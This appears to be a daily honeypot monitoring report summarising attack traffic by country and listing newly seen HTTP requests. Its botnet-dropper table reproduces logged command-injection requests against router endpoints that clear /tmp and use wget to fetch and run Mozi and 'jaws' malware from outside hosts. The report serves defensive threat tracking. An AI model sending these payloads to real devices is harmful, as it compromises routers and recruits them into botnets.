Daily Report: 2025-04-28#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 5 stage 1 IP address(es), linked to 4 dropper URL(s).
There are 27 new requests that have never been observed before (these were added to the monitored request database.).
A total of 2097 requests were recorded during the day, originating from 5 different countries, with a peak of 455 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
CN | Georgia |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
103.42.243.86 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
123.4.49.93 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://123.4.49.93:44339/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
59.96.140.75 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://59.96.140.75:33894/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
90.189.112.148 | GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.1 |
103.48.64.122 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
232 | 1 | GET /README.md HTTP/1.1 |
238 | 1 | GET /6Rmh HTTP/1.1 |
239 | 1 | GET /Fx6h HTTP/1.1 |
256 | 1 | GET /Odin/http/call1745828103 HTTP/1.1 |
263 | 1 | GET /Q2qh HTTP/1.1 |
265 | 1 | GET /n3nN HTTP/1.1 |
271 | 1 | GET /odinhttpcall1745828103 HTTP/1.1 |
272 | 1 | GET /OdinHttpCall1745828103 HTTP/1.1 |
277 | 1 | GET /rC5r HTTP/1.1 |
278 | 1 | GET /Ns9c HTTP/1.1 |
293 | 1 | GET /tmp.php HTTP/1.1 |
312 | 1 | \x04\x01\x01\xBB@\xE9\xA1iadm:12345\x00 |
318 | 1 | GET /config/index?time=1745844135156373232 HTTP/1.1 |
332 | 1 | POST /api/user/binLookup?time=1745848300884437028 HTTP/1.1 |
335 | 1 | GET /api/bin/440393?time=1745848300387524762 HTTP/1.1 |
342 | 1 | \x04\x01\x01\xBB@\xE9\xA1i\x00 |
351 | 1 | GET /odinhttpcall1745867188 HTTP/1.1 |
352 | 1 | GET /odinhttpcall1745867310 HTTP/1.1 |
353 | 1 | GET /OdinHttpCall1745867310 HTTP/1.1 |
354 | 1 | GET /Odin/http/call1745867310 HTTP/1.1 |
358 | 1 | GET /OdinHttpCall1745867188 HTTP/1.1 |
359 | 1 | GET /Odin/http/call1745867188 HTTP/1.1 |
368 | 1 | GET /HaRa HTTP/1.1 |
369 | 1 | GET /eTo5 HTTP/1.1 |
390 | 1 | GET /jasperserverTest/login.html HTTP/1.1 |
400 | 1 | GET /config/index?time=1745841660963416564 HTTP/1.1 |
401 | 1 | POST /api/user/binLookup?time=1745844547990456700 HTTP/1.1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 455 | US |
1 | 314 | GB |
2 | 262 | DE |
3 | 262 | NL |
4 | 172 | SC |
5 | 105 | VN |
6 | 92 | PL |
7 | 66 | BG |
8 | 60 | HK |
9 | 45 | CN |
10 | 45 | KZ |
11 | 41 | IN |
12 | 35 | UA |
13 | 18 | ZA |
14 | 18 | GH |
15 | 10 | FR |
16 | 10 | CH |
17 | 8 | JP |
18 | 7 | KR |
19 | 6 | PT |
20 | 6 | LT |
21 | 6 | AU |
22 | 6 | CA |
23 | 6 | AO |
24 | 5 | RU |
25 | 5 | SG |
26 | 5 | TR |
27 | 4 | BE |
28 | 3 | ID |
29 | 3 | RO |
30 | 2 | TH |
31 | 2 | MC |
32 | 2 | BR |
33 | 2 | PH |
34 | 2 | FI |
35 | 2 | ES |
36 | 1 | KE |
37 | 1 | IR |
38 | 1 | IT |
39 | 1 | NZ |
40 | 1 | AR |